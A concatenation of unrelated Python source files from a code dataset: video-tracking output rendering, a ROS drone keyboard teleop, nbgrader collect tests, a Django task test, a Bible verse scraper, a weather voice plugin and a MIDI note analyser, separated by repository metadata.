output_directory = ensure_dir(output_dir)
files = [os.path.join(video_dir, file) for file in os.listdir(video_dir) if file.endswith('.mp4')]
out_path = uniquify(os.path.join(output_directory, 'merged.mp4'))
command = ["ffmpeg"]
input_files = [["-i", file] for file in files]
input_files = [item for sublist in input_files for item in sublist]
aspect_ratio_handler = [
f'[{i}]scale=1280:720:force_original_aspect_ratio=decrease,pad=1280:720:(ow-iw)/2:(oh-ih)/2,setsar=1[v{i}];' for
i in range(len(files))]
streams = [f'[v{i}][{i}:a:0]' for i in range(len(files))]
concat = [f"concat=n={len(files)}:v=1:a=1[v][a]"]
mapper = ['-map', '[v]', '-map', '[a]']
sync = ["-vsync", "2"]
options = input_files + ["-filter_complex"] + [
f"{''.join(aspect_ratio_handler + streams + concat)}"] + mapper + sync + [out_path]
args = command + options
subprocess.run(args, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)
def render_heatmap(out_dir: Path, data: pd.DataFrame, key: list, **kwargs) -> None:
"""
:param data: DataFrame with data to plot
:param out_dir: folder where to save the heatmap
:keyword resolution: tuple(width, height)
:return: None
"""
print(data)
data = data[data['object_name'].isin(key)]
print(data)
res = (1920, 1080) if kwargs.get('resolution') is None else kwargs.get('resolution')
data.fillna(0, inplace=True)
img = np.zeros((res[1], res[0], 4), dtype=np.uint)
for _, row in data.iterrows():
left, top, right, bottom = ensure_coords(row['left'], row['top'], row['right'], row['bottom'])
img[int(top * res[1]):int(bottom * res[1]), int(left * res[0]):int(right * res[0]), 0:3] += 1
img = img / img.max()
img[0:res[1], 0:res[0], 3] = 1
from scipy.ndimage.filters import gaussian_filter
img = gaussian_filter(img, sigma=5)
from matplotlib.colors import LinearSegmentedColormap
cmap = LinearSegmentedColormap.from_list("", ["blue", "red"])
video_id, object_name = data['id'].iat[0], data['object_name'].iat[0]
out_path = out_dir / f"{video_id}_{object_name}.png"
plt.imshow(img, cmap=cmap)
plt.imsave(uniquify(out_path.as_posix()), img, cmap=cmap)
def berensham(x1, y1, x2, y2):
dx = abs(x2 - x1)
dy = abs(y2 - y1)
sx = 1 if x1 < x2 else -1
sy = 1 if y1 < y2 else -1
err = dx - dy
while True:
yield x1, y1
if x1 == x2 and y1 == y2:
break
e2 = 2 * err
if e2 > -dy:
err -= dy
x1 += sx
if e2 < dx:
err += dx
y1 += sy
def render_traces(out_dir: Path, data: pd.DataFrame, key: list, **kwargs) -> None:
"""
:param data: DataFrame with data to plot
:param out_dir: folder where to save the traces
:keyword resolution: tuple(width, height)
:return: None
"""
print(list(data))
data = data[data['object_name'].isin(key)]
res = (1920, 1080) if kwargs.get('resolution') is None else kwargs.get('resolution')
data.fillna(0, inplace=True)
img = np.zeros((res[1], res[0], 4), dtype=np.uint)
# we need to cluster data by obj_id in order to follow the same object troughout the video
data = data.groupby('object_id').apply(lambda x: x.sort_values('time_seconds'))
# since centroids's positions are not guaranteed to be continuous, we need tro draw a line from point 'n' to point 'n+1'
# we will use Bresenham's line algorithm to do so
for _, group in data.groupby('object_id'):
for i in range(len(group)-1):
left, top, right, bottom = ensure_coords(group['left'].iloc[i], group['top'].iloc[i], group['right'].iloc[i], group['bottom'].iloc[i])
centroid = (int((left + right) / 2 * res[0]), int((top + bottom) / 2 * res[1]))
n_left, n_top, n_right, n_bottom = ensure_coords(group['left'].iloc[i+1], group['top'].iloc[i+1], group['right'].iloc[i+1], group['bottom'].iloc[i+1])
next_centroid = (int((n_left + n_right) / 2 * res[0]), int((n_top + n_bottom) / 2 * res[1]))
for x, y in berensham(centroid[0], centroid[1], next_centroid[0], next_centroid[1]):
img[(y-5):(y+5), (x-5):(x), 0:3] += 1
img = img / img.max()
img[0:res[1], 0:res[0], 3] = 1
video_id, object_name = data['id'].iat[0], data['object_name'].iat[0]
out_path = out_dir / f"{video_id}_{object_name}.png"
plt.imsave(uniquify(out_path.as_posix()), img)
print(f"Rendered trace for {video_id} {object_name}")
return None
def extract_object_thumbnails(in_dir: Path, out_dir: Path, data: pd.DataFrame, key: list) -> None:
"""
Given a video and a dataframe with object tracking annotations extracts thumbnails of selected the objects
:rtype: None
:param key: name of the object to extract
:param in_dir: directory where the source video is stored
:param out_dir: directory where to save the thumbnails
:param data: dataframe with object tracking annotations
:return: None
"""
data = data[data['object_name'].isin(key)]
data = interpolate_missing_data(data)
extract_object_thumbs(in_dir, out_dir, data)
return None
def extract_object_gifs(in_dir: Path, out_dir: Path, data: pd.DataFrame, key: list) -> None:
"""
Given a video and a dataframe with object tracking annotations extracts gifs of selected the objects
:rtype: None
:param key: name of the object to extract
:param in_dir: directory where the source video is stored
:param out_dir: directory where to save the thumbnails
:param data: dataframe with object tracking annotations
:return: None
"""
data = data[data['object_name'].isin(key)]
data = interpolate_missing_data(data)
extract_obj_gifs_parallel(in_dir, out_dir, data)
return None
def extract_masked_clips(in_dir: Path, out_dir: Path, data: pd.DataFrame, key: list) -> None:
"""
Given a video and a dataframe with object tracking annotations extracts clips of selected the objects
:param key: name of the object to extract
:param in_dir: directory where the source video is stored
:param out_dir: directory where to save the clips
:param data: dataframe with object tracking annotations
:return: None
"""
data = data[data['object_name'].isin(key)]
data = interpolate_missing_data(data)
extract_masked_object_clips(in_dir, out_dir, data)
def extract_object_metavideo(in_dir: Path, out_dir: Path, data: pd.DataFrame, key: list) -> None:
"""
Given a video and a dataframe with object tracking annotations extracts clips of selected the objects
:param key: name of the object to extract
:param in_dir: directory where the source video is stored
:param out_dir: directory where to save the clips
:param data: dataframe with object tracking annotations
:return: None
"""
data = data[data['object_name'].isin(key)]
data = interpolate_missing_data(data)
temp_dir = tempfile.TemporaryDirectory()
extract_masked_object_clips(in_dir, Path(temp_dir.name), data, color=(0, 255, 0, 0))
merge_with_chromakey(Path(temp_dir.name), out_dir)
def extract_object_metagrid(in_dir: Path, out_dir: Path, data: pd.DataFrame, key: list) -> None:
"""
Given a video and a dataframe with object tracking annotations extracts clips of selected the objects
:param key: name of the object to extract
:param in_dir: directory where the source video is stored
:param out_dir: directory where to save the clips
:param data: dataframe with object tracking annotations
:return: None
"""
data = data[data['object_name'].isin(key)]
data = interpolate_missing_data(data)
temp_dir = tempfile.TemporaryDirectory()
extract_object_thumbs(in_dir, Path(temp_dir.name), data)
get_metagrid(Path(temp_dir.name), out_dir)
| lucadra/mismas | output.py | output.py | py | 20,425 | python | en | code | 2 | github-code | 1 | [
{
"api_name": "pandas.DataFrame",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "typing.List",
"line_number": 22,
"usage_type": "name"
},
{
"api_name": "pandas.concat",
"line_number": 50,
"usage_type": "call"
},
{
"api_name": "pandas.DataFrame",
... |
29551740207 | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import curses
import math
import rospy
import sys
import dynamic_reconfigure.server
from std_msgs.msg import String
from std_msgs.msg import Empty
from geometry_msgs.msg import Twist
from demo_teleop.cfg import SafeDroneTeleopConfig
class Status:
def __init__(self):
self.status = "landed" # "landing" "taking off" "automatic flight" "manual flight"
self.last_time = rospy.Time()
self.last_input = rospy.Time()
self.twist = Twist()
self.in_twist = Twist()
self.state_wait = 3.0 # transition between states (taking_off, landing, etc..)
self.watchdog_time = .25 # input crash security delay (no input twist => stop)
self.linear = 0.1 # initial value
self.angular = 0.5 # initial value
self.delay = 2.0 # initial value
self.status_pub = rospy.Publisher ('status', String, queue_size=1)
self.r_pub = rospy.Publisher ('reset', Empty, queue_size=1)
self.t_pub = rospy.Publisher ('takeoff', Empty, queue_size=1)
self.l_pub = rospy.Publisher ('land', Empty, queue_size=1)
self.twist_pub = rospy.Publisher ('cmd_vel_out', Twist, queue_size=1)
self.twist_sub = rospy.Subscriber('cmd_vel_in', Twist, self.on_twist, queue_size = 1)
self.config_srv = dynamic_reconfigure.server.Server(SafeDroneTeleopConfig, self.on_reconf)
def on_reconf(self, config, level):
self.angular = config['angular']
self.linear = config['linear']
self.delay = config['delay']
return config
def on_twist(self, ros_data):
self.in_twist = ros_data
self.last_input = rospy.Time.now()
def send_twist(self):
if self.status == "manual flight":
self.twist_pub.publish(self.twist)
elif self.status == "automatic flight":
time = rospy.Time.now()
if(time - self.last_input).to_sec() > self.watchdog_time :
self.in_twist = Twist()
self.twist_pub.publish(self.in_twist)
def take_off(self):
if self.status == "landed" :
self.twist = Twist()
self.status = "taking off"
self.status_pub.publish(self.status)
self.r_pub.publish(Empty())
rospy.sleep(1.)
self.t_pub.publish(Empty())
self.last_time = rospy.Time.now()
def land(self):
self.last_time = rospy.Time.now()
self.twist = Twist()
self.status = "landing"
self.l_pub.publish(Empty())
def nop(self):
if self.status == "manual flight" :
time = rospy.Time.now()
if (time - self.last_time).to_sec() > self.delay :
self.status = "automatic flight"
elif self.status == "taking off":
time = rospy.Time.now()
if (time - self.last_time).to_sec() > self.state_wait :
self.status = "manual flight"
self.last_time = time
self.twist = Twist()
elif self.status == "landing":
time = rospy.Time.now()
if (time - self.last_time).to_sec() > self.state_wait :
self.status = "landed"
self.status_pub.publish(self.status)
self.send_twist()
def key_pressed(self):
self.last_time = rospy.Time.now()
if self.status != "manual flight":
self.twist = Twist()
if self.status == "automatic flight" :
self.status = "manual flight"
self.send_twist()
def main(stdscr):
xlevel = 0
ylevel = 0
zlevel = 0
alevel = 0
rospy.init_node('safe_drone_teleop', anonymous=True)
log_pub = rospy.Publisher ('log', String, queue_size=1)
rate = rospy.Rate(10)
keycode = -1
status = Status()
stdscr.addstr("Safe drone controller\n")
stdscr.addstr("---------------------\n")
stdscr.addstr("\n")
stdscr.addstr("Command\n")
stdscr.addstr(" - UP/DOWN : control linear x\n")
stdscr.addstr(" - LEFT/RIGHT : control linear y\n")
stdscr.addstr(" - e/r : control angular z\n")
stdscr.addstr(" - t/l : take off / land\n")
stdscr.addstr(" - PAGE UP/DOWN : elevation control\n")
stdscr.addstr(" - any key : reset of the twist\n")
# We set the "wait for a key press" period to 100 ms.
stdscr.timeout(100)
while (not rospy.is_shutdown()):
keycode = stdscr.getch() # Wait for a key press for at most 100ms
if keycode == -1 :
status.nop() # No key has been pressed, we keep current twist.
elif keycode == curses.KEY_UP :
status.key_pressed()
if xlevel == -1 :
status.twist.linear.x = 0
xlevel = 0
elif xlevel == 0:
status.twist.linear.x = status.linear
xlevel = 1
elif keycode == curses.KEY_DOWN :
status.key_pressed()
if xlevel == 0 :
status.twist.linear.x = -status.linear
xlevel = -1
elif xlevel == 1:
status.twist.linear.x = 0
xlevel = 0
elif keycode == curses.KEY_LEFT :
status.key_pressed()
if ylevel == -1 :
status.twist.linear.y = 0
ylevel = 0
elif ylevel == 0:
status.twist.linear.y = status.linear
ylevel = 1
elif keycode == curses.KEY_RIGHT :
status.key_pressed()
if ylevel == 0 :
status.twist.linear.y = -status.linear
ylevel = -1
elif ylevel == 1:
status.twist.linear.y = 0
ylevel = 0
elif keycode == curses.KEY_PPAGE :
status.key_pressed()
if zlevel == -1 :
status.twist.linear.z = 0
zlevel = 0
elif zlevel == 0:
status.twist.linear.z = status.linear
zlevel = 1
elif keycode == curses.KEY_NPAGE :
status.key_pressed()
if zlevel == 1 :
status.twist.linear.z = 0
zlevel = 0
elif zlevel == 0:
status.twist.linear.z = -status.linear
zlevel = -1
elif keycode == 101 : # e
status.key_pressed()
if alevel == -1 :
status.twist.angular.z = 0
alevel = 0
elif alevel == 0:
status.twist.angular.z = status.angular
alevel = 1
elif keycode == 114 : # r
status.key_pressed()
if alevel == 0 :
status.twist.angular.z = -status.angular
alevel = -1
elif alevel == 1:
status.twist.angular.z = 0
alevel = 0
elif keycode == 116 : # t
status.take_off()
xlevel = 0
ylevel = 0
zlevel = 0
alevel = 0
elif keycode == 108 : # l
status.land()
xlevel = 0
ylevel = 0
zlevel = 0
alevel = 0
else :
status.key_pressed()
status.twist = Twist()
xlevel = 0
ylevel = 0
zlevel = 0
alevel = 0
if status.status == "automatic flight" :
xlevel = 0
ylevel = 0
zlevel = 0
alevel = 0
status.twist = Twist()
# Starts curses (terminal handling) and run our main function.
if __name__ == '__main__':
try:
curses.wrapper(lambda w: main(w))
except rospy.ROSInterruptException:
pass
| HerveFrezza-Buet/demo-teleop | scripts/safe_drone_teleop.py | safe_drone_teleop.py | py | 7,982 | python | en | code | 1 | github-code | 1 | [
{
"api_name": "rospy.Time",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "rospy.Time",
"line_number": 18,
"usage_type": "call"
},
{
"api_name": "geometry_msgs.msg.Twist",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "geometry_msgs.msg.Twist... |
74540351072 | import datetime
import os
import time
import pytest
from os.path import join
from .. import run_nbgrader
from .base import BaseTestApp
from .conftest import notwindows
from ...api import Gradebook
from ...utils import parse_utc, get_username
@notwindows
class TestNbGraderCollect(BaseTestApp):
def _release_and_fetch(self, assignment, exchange, course_dir):
self._copy_file(os.path.join("files", "test.ipynb"), os.path.join(course_dir, "release", "ps1", "p1.ipynb"))
run_nbgrader([
"release_assignment", assignment,
"--course", "abc101",
"--Exchange.root={}".format(exchange)
])
run_nbgrader([
"fetch_assignment", assignment,
"--course", "abc101",
"--Exchange.root={}".format(exchange)
])
def _submit(self, assignment, exchange, cache, flags=None):
cmd = [
"submit", assignment,
"--course", "abc101",
"--Exchange.cache={}".format(cache),
"--Exchange.root={}".format(exchange)
]
if flags is not None:
cmd.extend(flags)
run_nbgrader(cmd)
def _collect(self, assignment, exchange, flags=None, retcode=0):
cmd = [
"collect", assignment,
"--course", "abc101",
"--Exchange.root={}".format(exchange)
]
if flags is not None:
cmd.extend(flags)
return run_nbgrader(cmd, retcode=retcode)
def _read_timestamp(self, root):
with open(os.path.os.path.join(root, "timestamp.txt"), "r") as fh:
timestamp = parse_utc(fh.read())
return timestamp
def test_help(self):
"""Does the help display without error?"""
run_nbgrader(["collect", "--help-all"])
def test_no_course_id(self, exchange, course_dir, cache):
"""Does releasing without a course id thrown an error?"""
self._release_and_fetch("ps1", exchange, course_dir)
self._submit("ps1", exchange, cache)
cmd = [
"collect", "ps1",
"--Exchange.root={}".format(exchange)
]
run_nbgrader(cmd, retcode=1)
def test_collect(self, exchange, course_dir, cache):
self._release_and_fetch("ps1", exchange, course_dir)
# try to collect when there"s nothing to collect
self._collect("ps1", exchange)
root = os.path.os.path.join(os.path.join(course_dir, "submitted", get_username(), "ps1"))
assert not os.path.isdir(os.path.join(course_dir, "submitted"))
# submit something
self._submit("ps1", exchange, cache)
time.sleep(1)
# try to collect it
self._collect("ps1", exchange)
assert os.path.isfile(os.path.os.path.join(root, "p1.ipynb"))
assert os.path.isfile(os.path.os.path.join(root, "timestamp.txt"))
timestamp = self._read_timestamp(root)
# try to collect it again
self._collect("ps1", exchange)
assert self._read_timestamp(root) == timestamp
# submit again
self._submit("ps1", exchange, cache)
# collect again
self._collect("ps1", exchange)
assert self._read_timestamp(root) == timestamp
# collect again with --update
self._collect("ps1", exchange, ["--update"])
assert self._read_timestamp(root) != timestamp
def test_collect_assignment_flag(self, exchange, course_dir, cache):
self._release_and_fetch("ps1", exchange, course_dir)
self._submit("ps1", exchange, cache)
# try to collect when there"s nothing to collect
self._collect("--assignment=ps1", exchange)
root = os.path.os.path.join(os.path.join(course_dir, "submitted", get_username(), "ps1"))
assert os.path.isfile(os.path.os.path.join(root, "p1.ipynb"))
assert os.path.isfile(os.path.os.path.join(root, "timestamp.txt"))
def test_collect_subdirectories(self, exchange, course_dir, cache):
self._release_and_fetch("ps1", exchange, course_dir)
# create a subdirectory with an empty file
os.makedirs(os.path.join('ps1', 'foo'))
with open(os.path.join('ps1', 'foo', 'temp.txt'), 'w') as fh:
fh.write("")
self._submit("ps1", exchange, cache)
# make sure collect succeeds
self._collect("ps1", exchange)
def test_owner_check(self, exchange, course_dir, cache):
self._release_and_fetch("ps1", exchange, course_dir)
self._submit("ps1", exchange, cache, flags=["--student=foobar_student",])
# By default, a warning is raised if the student id does not match the directory owner
out = self._collect("--assignment=ps1", exchange)
assert 'WARNING' in out
# This warning can be disabled
out = self._collect("--assignment=ps1", exchange, flags=["--ExchangeCollect.check_owner=False"])
assert 'WARNING' not in out
@notwindows
@pytest.mark.parametrize("groupshared", [False, True])
def test_permissions(self, exchange, course_dir, cache, groupshared):
if groupshared:
with open("nbgrader_config.py", "a") as fh:
fh.write("""c.CourseDirectory.groupshared = True\n""")
self._release_and_fetch("ps1", exchange, course_dir)
self._submit("ps1", exchange, cache, flags=["--student=foobar_student",])
# By default, a warning is raised if the student id does not match the directory owner
self._collect("--assignment=ps1", exchange)
assert self._get_permissions(join(exchange, "abc101", "inbound")) == ("2733" if not groupshared else "2773")
assert self._get_permissions(join(course_dir, "submitted", "foobar_student", "ps1")) == ("777" if not groupshared else "2777")
assert self._get_permissions(join(course_dir, "submitted", "foobar_student", "ps1", "p1.ipynb")) == ("644" if not groupshared else "664")
@pytest.mark.parametrize('before_duedate',
['yes', 'no', 'nofirst'])
def test_collect_before_due_date(self, exchange, course_dir, cache, db, before_duedate):
"""Test --before-duedate flag.
Test is parameterized so we test both with it and without the flag.
'yes': test with --before-duedate
'no': test without
'nofirst': test with --before-duedate but no assignment before duedate
"""
# Release assignment
self._release_and_fetch("ps1", exchange, course_dir)
# Submit something, wait, submit again. Due date is between.
if before_duedate != 'nofirst':
# We don't submit first assignment.
self._submit("ps1", exchange, cache)
time.sleep(.05)
time_duedate = datetime.datetime.utcnow()
time.sleep(.05)
self._submit("ps1", exchange, cache)
# Set the due date
with Gradebook(db) as gb:
gb.update_or_create_assignment('ps1', duedate=time_duedate)
# Collect
flags = ['--db', db]
if before_duedate != 'no':
flags.append('--before-duedate')
self._collect("ps1", exchange, flags=flags)
root = os.path.os.path.join(os.path.join(course_dir, "submitted", get_username(), "ps1"))
timestamp = self._read_timestamp(root)
# Test both ways: with --before-duedate flag and without
if before_duedate == 'yes':
assert timestamp < time_duedate
else: # 'no', 'nofirst'
assert timestamp > time_duedate
| jupyter/nbgrader | nbgrader/tests/apps/test_nbgrader_collect.py | test_nbgrader_collect.py | py | 7,521 | python | en | code | 1,232 | github-code | 1 | [
{
"api_name": "base.BaseTestApp",
"line_number": 16,
"usage_type": "name"
},
{
"api_name": "os.path.join",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 19,
"usage_type": "attribute"
},
{
"api_name": "os.path.os.path.join",
... |
27459770248 | from django.test import TestCase
from django.urls import reverse
from .models import Tarefa
class TarefaTestCase(TestCase):
def setUp(self):
self.tarefa1 = Tarefa.objects.create(titulo='Tarefa 1', texto='Texto da tarefa 1')
self.tarefa2 = Tarefa.objects.create(titulo='Tarefa 2', texto='Texto da tarefa 2')
def test_criar_tarefa(self):
# Fazer uma requisição POST para criar uma nova tarefa
response = self.client.post(reverse('criar_tarefa'), {'titulo': 'Nova Tarefa', 'texto': 'Texto da nova tarefa'})
# Verificar se a tarefa foi criada no banco de dados
self.assertTrue(Tarefa.objects.filter(titulo='Nova Tarefa', texto='Texto da nova tarefa').exists())
# Verificar se a tarefa criada está sendo exibida na página de listagem de tarefas
response = self.client.get(reverse('criar_tarefa'))
self.assertContains(response, 'Nova Tarefa')
def test_excluir_tarefa(self):
# Verificar se a tarefa 1 existe antes da exclusão
self.assertTrue(Tarefa.objects.filter(id=self.tarefa1.id).exists())
# Fazer uma requisição POST para excluir a tarefa 1
response = self.client.post(reverse('excluir_tarefa', args=[self.tarefa1.id]))
# Verificar se a resposta é um redirecionamento para a página de criação de tarefas
self.assertRedirects(response, reverse('criar_tarefa'))
# Verificar se a tarefa 1 foi removida do banco de dados
self.assertFalse(Tarefa.objects.filter(id=self.tarefa1.id).exists())
# Verificar se a tarefa 2 ainda existe
self.assertTrue(Tarefa.objects.filter(id=self.tarefa2.id).exists())
| matheudsp/djangoTDD | djangoProject/djangoApp/tests.py | tests.py | py | 1,694 | python | pt | code | 0 | github-code | 1 | [
{
"api_name": "django.test.TestCase",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "models.Tarefa.objects.create",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "models.Tarefa.objects",
"line_number": 8,
"usage_type": "attribute"
},
{
"api_nam... |
9628750264 | # -*- coding: utf-8-*-
import re
import requests
import os
from client.plugins.utilities import jasperpath
WORDS = ["WEATHER"]
def findWholeWord(w):
return re.compile(r'\b({0})\b'.format(w), flags=re.IGNORECASE).search
def handle(text, mic, speaker, profile, visionProcess):
"""
Responds to user-input, typically speech text, by relaying the
meaning of life.
Arguments:
text -- user-input, typically transcribed speech
mic -- used to interact with the user (for both input and output)
profile -- contains information related to the user (e.g., phone
number)
"""
#message = "Hold on, checking the weather for you..."
# mic.say(message)
location_name = "Bangalore"
if re.search('(?<=TODAY)(.*)', text):
weather_for = 'today'
elif re.search('(?<=TOMORROW)(.*)', text):
weather_for = 'tomorrow'
elif re.search('(?<=THIS WEEK)(.*)', text):
weather_for = 'this_week'
elif re.search('(?<=NEXT WEEK)(.*)', text):
weather_for = 'next_week'
else:
weather_for = 'today'
if re.search('(?<=IN)(.*)', text, re.IGNORECASE):
print("Found word in.. that means location is specified")
location_temp = re.search("IN (\w+)", text, re.IGNORECASE)
location_name = str(location_temp.group(1))
name_start = ['NEW', 'SAN', 'ABU', 'PORT', 'KUALA', 'LOS']
if location_name.upper() in name_start:
print("Complex city name")
location_temp2 = re.search(location_name + " (\w+)", text)
location_name = location_name + " " + str(location_temp2.group(1))
openWeatherCurrentUrl = 'http://api.openweathermap.org/data/2.5/weather?q=' + \
location_name + '&units=metric&appid=4f95de0f661f4bb718a10067a7f27b60'
openWeatherForeCastUrl = "api.openweathermap.org/data/2.5/forecast?q=" + \
location_name + '&units=metric'
responseObject = requests.get(openWeatherCurrentUrl)
responseData = responseObject.json()
temp_now = responseData['main']['temp']
humidity = responseData['main']['humidity']
description_short = responseData['weather'][0]['main']
"""
sunset = responseData['sys']['sunset']
sunrise = responseData['sys']['sunrise']
temp_max = responseData['main']['temp_max']
temp_min = responseData['main']['temp_min']
temp_now = responseData['main']['temp']
humidity = responseData['main']['humidity']
description_short = responseData['weather'][0]['main']
description_long = responseData['weather'][0]['description']
print temp_max
print temp_min
print temp_now
"""
iconCode = responseData['weather'][0]['icon']
iconURL = 'http://openweathermap.org/img/w/' + iconCode + '.png'
icon_path = jasperpath.WEATHER_ICONS + "/" + iconCode + '.png'
if not os.path.isfile(icon_path):
resp = requests.get(iconURL)
if resp.status_code == 200:
with open(icon_path, 'wb') as f:
for chunk in resp.iter_content(1024):
f.write(chunk)
weather_message = "It is currently " + str(temp_now) + " degrees with " + str(
humidity) + " percent humidity. The weather type is " + description_short
# Need to modify message according to weather_for
visionProcess['image_path'] = icon_path
# visionProcess['message']=weather_message
# visionProcess['message_timeout']=int(5)
speaker.clean_and_say(weather_message)
def isValid(text):
"""
Returns True if the input is related to the meaning of life.
Arguments:
text -- user-input, typically transcribed speech
"""
return bool(re.search(r'\bWhat is the weather', text, re.IGNORECASE)
or re.search(r'\bWhat\'s the weather', text, re.IGNORECASE)
or re.search(r'\bHow\'s the weather', text, re.IGNORECASE)
or re.search(r'\bHow is the weather', text, re.IGNORECASE))
| shreyashag/ipawac_assistant | ipawac_assistant/assistant-modules/OpenWeather.py | OpenWeather.py | py | 3,987 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "re.compile",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "re.IGNORECASE",
"line_number": 11,
"usage_type": "attribute"
},
{
"api_name": "re.search",
"line_number": 30,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number"... |
34000524076 | import pandas as pd
from collections import Counter
import matplotlib.pyplot as plt
import numpy as np
df = pd.read_csv('survey_results_responses.csv')
# print(df.head())
ids = df['ResponseId']
lang_responses = df['LanguageHaveWorkedWith']
languages_counter = Counter()
for response in lang_responses:
if isinstance(response, str):
languages_counter.update(response.split(';'))
languages = []
popularity = []
for item in languages_counter.most_common(15):
languages.append(item[0])
popularity.append(item[1])
print(languages)
print(popularity)
# plt.bar(languages, popularity)
plt.barh(languages, popularity)
plt.show() | Nahid-Hassan/python-data-visualization | ashik_bhai_phd/lang-popu.py | lang-popu.py | py | 649 | python | en | code | 0 | github-code | 1 | [
{
"api_name": "pandas.read_csv",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "collections.Counter",
"line_number": 13,
"usage_type": "call"
},
{
"api_name": "matplotlib.pyplot.barh",
"line_number": 31,
"usage_type": "call"
},
{
"api_name": "matplotlib.... |
11625575005 | import re
import json
import requests
from tqdm import tqdm
from bs4 import BeautifulSoup
from requests import Session
from concurrent.futures import ThreadPoolExecutor
def main():
extractor = BibleExtractor()
# list of all possible books
book_nums = list(range(1, 67))
# map of books to chapters to verse content
data = []
urls = []
# generate a list of URLs for each chapter
for book_num in tqdm(book_nums, desc="Generating URLs"):
json_data = extractor.get_json_data_for_extra_verse_info(book_num)
num_chapters = extractor.get_num_chapters_in_book(json_data)
for chapter_num in range(1, num_chapters + 1):
url = AppSettings.main_verse_url(book_num, chapter_num)
urls.append(url)
def fetch_and_extract(args):
url, session = args
response = session.get(url)
if response.status_code == 200:
# Extract book_num and chapter_num from the URL
book_num, chapter_num = re.findall(r"/(\d+)/(\d+)", url)[0]
book_num, chapter_num = int(book_num), int(chapter_num)
# Extract verses
chapter_data = {}
json_data = extractor.get_json_data_for_extra_verse_info(book_num)
num_verses = extractor.get_num_verses_in_chapter(chapter_num, json_data)
for verse_num in range(1, num_verses + 1):
if not response.content:
continue
try:
verse = extractor.extract_verse_from_html(book_num, chapter_num, verse_num, response.content)
except AttributeError as e:
print(f"Error extracting verse: {book_num} {chapter_num} {verse_num}")
continue
chapter_data[verse_num] = verse
return book_num, chapter_num, chapter_data
return None
with Session() as session:
# Scrape each URL and map book to chapters to verses content
with ThreadPoolExecutor(max_workers=10) as executor:
args = [(url, session) for url in urls]
for result in tqdm(executor.map(fetch_and_extract, args), total=len(urls), desc="Scraping"):
if result:
book_num, chapter_num, chapter_data = result
data.append({"book": book_num, "chapter": chapter_num, "verses": chapter_data})
with open("verses.json", "w") as f:
json.dump({"data": data}, f)
class BibleExtractor:
def extract_verse_from_html(self, book_num, chapter_num, verse_num, html_content):
soup = BeautifulSoup(html_content, 'html.parser')
verse_id_string = self.construct_verse_id(book_num, chapter_num, verse_num)
verse = soup.select_one(f"#{verse_id_string}").text
cleaned_verse = re.sub(r"[0-9+*]", "", verse).strip()
return cleaned_verse
def get_json_data_for_extra_verse_info(self, book_num):
url = f"https://b.jw-cdn.org/apis/pub-media/GETPUBMEDIALINKS?pub=nwt&langwritten=E&txtCMSLang=E&fileformat=mp3&booknum={book_num}"
response = requests.get(url)
return json.loads(response.text)
def construct_verse_id(self, book_num, chapter_num, verse_num):
return f"v{book_num}-{chapter_num}-{verse_num}-1"
def get_num_verses_in_chapter(self, chapter_num, json_data):
num_verses = len(json_data["files"]["E"]["MP3"][int(chapter_num) - 1]["markers"]["markers"])
return num_verses
def get_num_chapters_in_book(self, json_data):
num_chapters = len(json_data["files"]["E"]["MP3"])
return num_chapters
def get_book_name(self, json_data):
book_name = json_data["pubName"]
return book_name
class AppSettings:
@staticmethod
def main_verse_url(book_num, chapter_num):
return f"https://wol.jw.org/en/wol/b/r1/lp-e/nwtsty/{book_num}/{chapter_num}#study=discover"
if __name__ == "__main__":
main()
| j-koziel/wol-api | scripts/scrape-verses/scrape_verses.py | scrape_verses.py | py | 3,978 | python | en | code | 5 | github-code | 1 | [
{
"api_name": "tqdm.tqdm",
"line_number": 22,
"usage_type": "call"
},
{
"api_name": "re.findall",
"line_number": 36,
"usage_type": "call"
},
{
"api_name": "requests.Session",
"line_number": 57,
"usage_type": "call"
},
{
"api_name": "concurrent.futures.ThreadPoolEx... |
73667290594 | from fractions import Fraction
from re import search, findall
from converter import get_absolute_path_for_file, text_files_folder_path
analysis_folder_path = 'analysis'
resolution = 480, 4 # 480/8 o 960/16
exp_pitch = 'pitch=(\d+) '
exp_vol = 'vol=(\d+)'
exp_time = 'Time=(\d+) '
exp_division = 'division=(\d+)'
exp_signature = 'signature=(\d+)\/(\d+)'
def get_notes(text_file_name: str) -> list:
note = []
with open(text_file_name, mode='r') as fhandler:
# div = 1440 # ticks for 3/8 bar
# div = 1920 # ticks for 4/4 bar
for i in fhandler:
if 'division' in i:
if search(exp_division, i):
division = int(search(exp_division, i).groups()[0])
if division != 480:
print(f"WARNING Division: {division}")
if 'signature' in i:
if search(exp_signature, i):
numerator, denominator = int(search(exp_signature, i).groups()[0]), \
int(search(exp_signature, i).groups()[1])
signature = Fraction(numerator, denominator)
div = signature * division * resolution[1]
print(div)
if 'Note on' in i:
if search(exp_pitch, i) and search(exp_vol, i) and search(exp_time, i):
n = int(findall(exp_pitch, i)[0])
v = int(findall(exp_vol, i)[0])
start = int(findall(exp_time, i)[0])
note.append(
[n, v, -start, False, start, int(start / div), int(int((start % div) / resolution[0]))])
if 'Note off' in i:
if search(exp_pitch, i) and search(exp_vol, i) and search(exp_time, i):
n = int(findall(exp_pitch, i)[0])
end = int(findall(exp_time, i)[0])
res = [item for item in note if item[0] == n and item[3] == False]
if len(res) > 1:
print('error')
continue
res[0][2] += end
res[0][3] = True
return note
def generate_file_a(notes: list, analysis_a_file: str):
with open(analysis_a_file, 'w') as fhandler_output:
last_bar = 0
last_sub_bar = 0
for n in notes:
bar = n[5]
sub_bar = n[6]
if last_bar != bar:
fhandler_output.write('------------- {0} -------------\n'.format(bar))
last_bar = bar
if last_sub_bar != sub_bar:
fhandler_output.write('--- {0} ---\n'.format(sub_bar))
last_sub_bar = sub_bar
fhandler_output.write('N={0} D={2} V={1} P={3}\n'.format(n[0], n[1], n[2], n[4]))
def analysis_a(text_file: str):
text_file_absolute_path = get_absolute_path_for_file(text_file, text_files_folder_path, 'txt')
